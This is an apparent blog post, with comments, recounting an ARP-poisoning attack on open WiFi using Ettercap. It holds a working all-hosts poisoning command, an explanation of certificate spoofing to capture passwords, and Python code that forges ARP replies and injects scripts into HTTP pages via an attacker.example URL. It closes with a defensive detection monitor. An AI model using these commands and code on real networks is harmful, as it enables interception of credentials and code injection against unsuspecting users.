ARP Spoofing and Public Networks
NOTHING I SAY IS TRUE, AND IF YOU TRY IT, YOUR COMPUTER WILL EXPLODE AND YOUR FRIENDS WILL ALL TURN AGAINST YOU. On a more serious note, doing this on a network you don’t own is illegal. Don’t.
Recently, I downloaded a copy of the penetration testing OS Backtrack. This is a great Linux LiveCD that includes many tools for security testing. One of the things that I really wanted to try out was ARP spoofing. For those who aren’t familiar, here’s a little explanation.
On a normal network, when computer A wants to talk to computer B on the same LAN, it needs B’s MAC address (basically the physical address on the network). To find it, A broadcasts an “ARP Request,” which looks something like “Who has 192.168.1.10? Tell 192.168.1.11.” Computer B answers with an “ARP Reply” carrying its MAC address, and A caches the answer. Traffic for other networks goes through the router, so A has to resolve the router’s MAC address the same way. The problem with this is that there’s no security: nothing in the exchange is authenticated, a host will happily accept a reply it never asked for, and it will overwrite an existing cache entry with whatever the latest packet says. If Attacker C gets on to the network with a MAC address of 11:22:33:44:55:66, and then sends this out:
- 192.168.1.1 is at 11:22:33:44:55:66
- 192.168.1.10 is at 11:22:33:44:55:66
- 192.168.1.11 is at 11:22:33:44:55:66
Suddenly, every host that accepted those replies thinks Computer A, Computer B, and the router are all located at Attacker C’s MAC address, so the frames they send to each other are delivered to the attacker instead. If Attacker C has IP forwarding enabled, there will be no interruption in browsing for Computer A or B. Their traffic will simply be passed on to its real destination, but it will be traveling through Attacker C’s computer first, where it can be read or modified. Why is this dangerous, you ask? I’ll explain more in the next section. I decided to check this out using a tool called Ettercap, which can do much more than just rerouting traffic. Ettercap comes included on the Backtrack Linux LiveCD I mentioned earlier, which means that anybody can download the image, put it on a CD or USB stick, and boot into a fully dangerous Linux OS without making any change to their system. I downloaded the USB version and put it on a USB stick, then booted into it.
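The exchange described above, as an added example that is not part of the original post: it builds the attacker’s unsolicited ARP replies byte for byte (Ethernet II header plus the 28-byte ARP packet), decodes them, and feeds them to a simulated copy of Computer A’s ARP cache that follows the usual permissive merge rule. The MAC addresses of the legitimate hosts and the choice of 192.168.1.11 as the victim are constructed for the example; only the attacker’s MAC comes from the text.

```python
import socket
import struct
from typing import Dict

ETH_TYPE_ARP = 0x0806
ARP_REQUEST, ARP_REPLY = 1, 2
ARP_FRAME_LEN = 14 + 28  # Ethernet II header + ARP packet


def mac_bytes(mac: str) -> bytes:
    return bytes.fromhex(mac.replace(":", ""))


def mac_str(raw: bytes) -> str:
    return ":".join(f"{b:02x}" for b in raw)


def build_arp(op: int, sender_ip: str, sender_mac: str,
              target_ip: str, target_mac: str) -> bytes:
    """Build one Ethernet frame carrying an ARP request or reply."""
    eth = mac_bytes(target_mac) + mac_bytes(sender_mac) + struct.pack("!H", ETH_TYPE_ARP)
    # htype=1 (Ethernet), ptype=0x0800 (IPv4), hlen=6, plen=4, opcode
    arp = struct.pack("!HHBBH", 1, 0x0800, 6, 4, op)
    arp += mac_bytes(sender_mac) + socket.inet_aton(sender_ip)
    arp += mac_bytes(target_mac) + socket.inet_aton(target_ip)
    return eth + arp


def parse_arp(frame: bytes) -> Dict[str, object]:
    """Decode an ARP-over-Ethernet frame; raises ValueError on anything else."""
    if len(frame) < ARP_FRAME_LEN or struct.unpack("!H", frame[12:14])[0] != ETH_TYPE_ARP:
        raise ValueError("not an ARP frame")
    htype, ptype, hlen, plen, op = struct.unpack("!HHBBH", frame[14:22])
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        raise ValueError("unsupported ARP hardware/protocol type")
    return {
        "op": op,
        "sender_mac": mac_str(frame[22:28]),
        "sender_ip": socket.inet_ntoa(frame[28:32]),
        "target_mac": mac_str(frame[32:38]),
        "target_ip": socket.inet_ntoa(frame[38:42]),
    }


class ArpCache:
    """A victim's ARP cache with the permissive merge rule of RFC 826: any ARP
    packet whose sender IP is already cached overwrites that entry, and replies
    create entries whether or not a request was ever sent."""

    def __init__(self, entries: Dict[str, str]):
        self.table = dict(entries)

    def process(self, frame: bytes) -> None:
        pkt = parse_arp(frame)
        if pkt["sender_ip"] in self.table or pkt["op"] == ARP_REPLY:
            self.table[pkt["sender_ip"]] = pkt["sender_mac"]


ATTACKER_MAC = "11:22:33:44:55:66"
# Constructed legitimate IP-to-MAC bindings for the hosts named in the post.
REAL_MAC = {
    "192.168.1.1": "02:00:00:00:00:01",   # router
    "192.168.1.10": "02:00:00:00:00:10",  # computer B
    "192.168.1.11": "02:00:00:00:00:11",  # computer A, the victim in this example
}


def poison_computer_a() -> Dict[str, str]:
    """Send A the unsolicited replies from the post and return A's resulting cache."""
    victim_ip, victim_mac = "192.168.1.11", REAL_MAC["192.168.1.11"]
    cache = ArpCache({ip: mac for ip, mac in REAL_MAC.items() if ip != victim_ip})
    for claimed_ip in ("192.168.1.1", "192.168.1.10"):
        frame = build_arp(ARP_REPLY, claimed_ip, ATTACKER_MAC, victim_ip, victim_mac)
        cache.process(frame)  # A never asked, but updates its cache anyway
    return cache.table


if __name__ == "__main__":
    for ip, mac in poison_computer_a().items():
        print(f"{ip} is at {mac}")
```

After the two forged replies, both the router and Computer B resolve to the attacker’s MAC in A’s cache, so every frame A sends to either of them lands on the attacker’s interface. The real ettercap session does the same for every host on the segment and keeps repeating the replies so the entries never age out.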
It took a few minutes to set up my network card, but I’m not going to go into that process this time. Once the network card was set up and ready, I was sitting in front of a fully ready attack/pentesting operating system. I decided to take it to a local public place that I own, which has an open WiFi network. This is when I fully realized how insecure ARP is.
I took my laptop to that public place, sat down, opened it up and connected to the wireless network. There’s a simple Ettercap command that just reroutes all traffic on the network using an ARP poisoning attack:
ettercap -T -q -M ARP // //
This doesn’t run any special filters or anything, but it does spoof every computer on the network (the two empty // // targets mean “everyone”), meaning all their traffic is flowing through your computer. By default, ettercap collects the plaintext passwords of the protocols it dissects, and with its SSL dissection enabled it also goes after HTTPS by certificate spoofing. Every HTTPS website presents a certificate, signed by a certificate authority the browser trusts, to prove the site’s identity. When the session is in place, ettercap generates a look-alike certificate for each site on the fly, but it can’t get that certificate signed by a trusted CA, so the browser flags it as untrusted. You may think that this would make people realize something is wrong, but people just click straight through the warning and log into whatever it is they’re trying to access, at which point ettercap is holding a plaintext copy of the session, password included. This is a HUGE problem, and it’s human error.
I enabled two ettercap plugins after I started my spoofing session by pressing “p” and typing the name of the plugin. The plugins were autoadd and repoison_arp. These names are fairly self-explanatory: autoadd automatically detects new hosts on the network and adds them to the poisoning list, and repoison_arp keeps sending false ARP replies during the whole session so the victims’ cache entries never revert.
The chk_poison plugin told me that my “attack” was working, but I wanted to check for myself, so I opened up Wireshark, my favorite network analyzer. Suddenly I saw everybody’s web traffic passing through my computer. The “attack” was indeed successful.
This default setup that captures passwords is enough for most attackers to do a lot of damage, but I decided to have a little fun while remaining non-malicious. For this I called upon Ettercap’s filters, which can search and replace data in a TCP stream in real time (and do a lot of other cool stuff). I used the info and example code listed in IronGeek’s article about Ettercap filters to replace the images on any website that people visited with an image of the hypnotoad. It worked great! Anywhere someone on the network tried to browse, they’d get images of the hypnotoad in place of their real images. This was just a proof of concept, and definitely wasn’t going to harm anybody’s computers, but the same kind of filter could just as easily inject a malicious script into every unencrypted page or swap a downloaded installer for a trojaned one, which is how an attacker in this position gets code running on other people’s computers.
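An added example, not code from the post or from IronGeek’s filter, showing what such a filter has to do to an HTTP exchange: strip compression from the client’s request so the server answers with a body the filter can actually search, swap every img src for a replacement URL, fix Content-Length so the browser does not stall on the shortened or lengthened body, and, as the malicious variant, drop a script tag into the page. The request, response and the attacker.example URLs are constructed for the example.

```python
import re
from typing import Callable, Tuple

HYPNOTOAD = b"http://attacker.example/hypnotoad.jpg"  # constructed placeholder URL


def strip_compression(request: bytes) -> bytes:
    """Rewrite the client's Accept-Encoding so the server sends an uncompressed
    body; a search-and-replace filter can't patch gzip without inflating it."""
    return re.sub(rb"(?im)^Accept-Encoding:[^\r\n]*", b"Accept-Encoding: identity", request)


def split_http(msg: bytes) -> Tuple[bytes, bytes]:
    head, sep, body = msg.partition(b"\r\n\r\n")
    return (head, body) if sep else (msg, b"")


def header(head: bytes, name: bytes) -> bytes:
    m = re.search(rb"(?im)^" + re.escape(name) + rb":[ \t]*([^\r\n]*)", head)
    return m.group(1) if m else b""


def rewrite_html(response: bytes, transform: Callable[[bytes], bytes]) -> bytes:
    """Apply transform() to an HTML body and repair Content-Length afterwards.
    Non-HTML and compressed responses are passed through untouched."""
    head, body = split_http(response)
    if b"text/html" not in header(head, b"Content-Type").lower():
        return response
    if header(head, b"Content-Encoding").lower() not in (b"", b"identity"):
        return response
    new_body = transform(body)
    new_head = re.sub(rb"(?im)^Content-Length:[^\r\n]*",
                      b"Content-Length: " + str(len(new_body)).encode(), head)
    return new_head + b"\r\n\r\n" + new_body


def rewrite_images(response: bytes, new_src: bytes = HYPNOTOAD) -> bytes:
    """The hypnotoad prank: point every <img src=...> at new_src."""
    pattern = rb"(<img\b[^>]*?\bsrc=)([\"'])[^\"']*\2"
    return rewrite_html(response, lambda body: re.sub(
        pattern, lambda m: m.group(1) + m.group(2) + new_src + m.group(2), body, flags=re.I))


def inject_script(response: bytes, script_url: bytes) -> bytes:
    """The same mechanism with a payload: a script loaded by every HTTP page."""
    tag = b'<script src="' + script_url + b'"></script>'
    return rewrite_html(response, lambda body: re.sub(
        rb"(?i)</body>", lambda m: tag + m.group(0), body, count=1))


# Constructed exchange: what a victim's browser sends and what the server answers.
SAMPLE_REQUEST = (b"GET /index.html HTTP/1.1\r\nHost: www.example.com\r\n"
                  b"Accept-Encoding: gzip, deflate\r\n\r\n")
SAMPLE_BODY = (b"<html><body><h1>Hi</h1>"
               b'<img src="/logo.png" alt="logo"><img src=\'/photo.jpg\'>'
               b"</body></html>")
SAMPLE_RESPONSE = (b"HTTP/1.1 200 OK\r\nContent-Type: text/html; charset=utf-8\r\n"
                   b"Content-Length: " + str(len(SAMPLE_BODY)).encode() + b"\r\n\r\n"
                   + SAMPLE_BODY)

if __name__ == "__main__":
    print(strip_compression(SAMPLE_REQUEST).decode())
    print(rewrite_images(SAMPLE_RESPONSE).decode())
```

The example works on one whole reassembled response; ettercap’s filters see one packet at a time, so a tag split across two TCP segments slips past them, and a site that serves its pages over HTTPS (with a certificate the user doesn’t click through) is out of reach of this rewriting entirely.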
It really all wraps up to this: the internet itself is broken. Stuff is insecure and easily exploitable. Make sure you always use a little common sense. When your browser warns you that Gmail is using an invalid security certificate, don’t just click through it. Warnings are put there for a reason. Anyone interested in protecting their network against ARP poisoning should read this paper.
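On the defensive side, the poisoning session described in this post has a loud signature on the wire, and an added example (mine, not the post’s or the linked paper’s) shows a small passive monitor in the style of arpwatch that catches it: an IP whose MAC suddenly changes (“flip-flop”), and a single MAC claiming several IPs within a short window, which is exactly what ettercap’s // // targets produce. The capture it runs over is constructed; in practice the tuples would come from decoded ARP frames off a mirror port or from the host’s own interface.

```python
from collections import defaultdict
from typing import Dict, List, Tuple

Alert = Tuple[str, str]  # (rule name, human-readable detail)


class ArpMonitor:
    """Passive ARP poisoning detector. Feed it every ARP packet seen on the
    segment as (timestamp, sender_ip, sender_mac) and collect the alerts."""

    def __init__(self, max_ips_per_mac: int = 1, window: float = 30.0):
        # A router or a host with several addresses legitimately answers for
        # more than one IP, so raise max_ips_per_mac for those rather than
        # whitelisting the rule away.
        self.max_ips_per_mac = max_ips_per_mac
        self.window = window
        self.binding: Dict[str, str] = {}                              # ip -> current mac
        self.claims: Dict[str, Dict[str, float]] = defaultdict(dict)   # mac -> {ip: last seen}
        self.flagged_macs = set()
        self.alerts: List[Alert] = []

    def observe(self, ts: float, sender_ip: str, sender_mac: str) -> List[Alert]:
        new: List[Alert] = []
        # Rule 1: flip-flop. An IP we already know moves to a different MAC.
        old = self.binding.get(sender_ip)
        if old is not None and old != sender_mac:
            new.append(("flip_flop", f"{sender_ip} moved from {old} to {sender_mac}"))
        self.binding[sender_ip] = sender_mac
        # Rule 2: one MAC claiming too many IPs inside the window.
        seen = self.claims[sender_mac]
        seen[sender_ip] = ts
        for ip in [ip for ip, last in seen.items() if ts - last > self.window]:
            del seen[ip]
        if len(seen) > self.max_ips_per_mac and sender_mac not in self.flagged_macs:
            self.flagged_macs.add(sender_mac)
            new.append(("multi_ip", f"{sender_mac} claims {sorted(seen)}"))
        self.alerts.extend(new)
        return new


# Constructed capture: normal traffic, then an ettercap-style session at t=60
# that is refreshed at t=70 (what repoison_arp does).
SAMPLE_ARP = [
    (0.0, "192.168.1.1", "02:00:00:00:00:01"),
    (1.0, "192.168.1.10", "02:00:00:00:00:10"),
    (2.0, "192.168.1.11", "02:00:00:00:00:11"),
    (60.0, "192.168.1.1", "11:22:33:44:55:66"),
    (60.1, "192.168.1.10", "11:22:33:44:55:66"),
    (60.2, "192.168.1.11", "11:22:33:44:55:66"),
    (70.0, "192.168.1.1", "11:22:33:44:55:66"),
    (70.1, "192.168.1.10", "11:22:33:44:55:66"),
]


def run_monitor(events=SAMPLE_ARP) -> List[Alert]:
    mon = ArpMonitor()
    for ts, ip, mac in events:
        mon.observe(ts, ip, mac)
    return mon.alerts


if __name__ == "__main__":
    for rule, detail in run_monitor():
        print(f"[{rule}] {detail}")
```

Detection is the cheap half; the monitor only tells you poisoning is happening. Stopping it takes static ARP entries on the hosts that matter, or a switch that enforces the IP-to-MAC bindings it learned from DHCP, plus the habit of not clicking through the certificate warning that the other half of the attack depends on.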
Feel free to yell at me, correct me, or suggest I change things by writing a comment.
Great blog, Nick! I’d be lying if I said I understood it all, but I got some of it. Keep up the good work. I’ll bookmark your blog (or blag) and come back often.
The Internet’s security model is that nodes will not have remotely exploitable holes. This looked like a reasonable requirement in 1970…
ARP, however, is a nasty little hack whose lone redeeming feature is its stone simplicity.
I did almost the same thing, although I took it a step further by adding this to my “little attack,” because people living near me are using my network!! I can of course just password-protect it, but that is not as fun as this!!! http://www.ex-parrot.com/pete/upside-down-ternet.html Upside down everything: pictures, menus and ads will all be upside down… I would so like to see people’s faces when they access my network.
Nice blog!! Credit from me. Hacking is fun, just don’t do anything stupid.
Unless of course you have to!!!
Is it ARP spoofing on my mini-notebook laptop that caused it to… have missing or corrupt files, Windows/Configuration 32/ crashed, inoperable, just from my accepting the offer to use my friend’s internet access connection provider, Cosa Nostra? Are my emails, messages, etc. all taken out of the laptop hard drive database? How do I stop the attacker from stealing my laptop after the USB stick has been inserted for the NETWORK SHARING? IS THIS A CYBER CRIME? DO I CONTACT THE FBI? Please help!
Uhh…
I don’t know what to say to you. Have you been diagnosed as paranoid?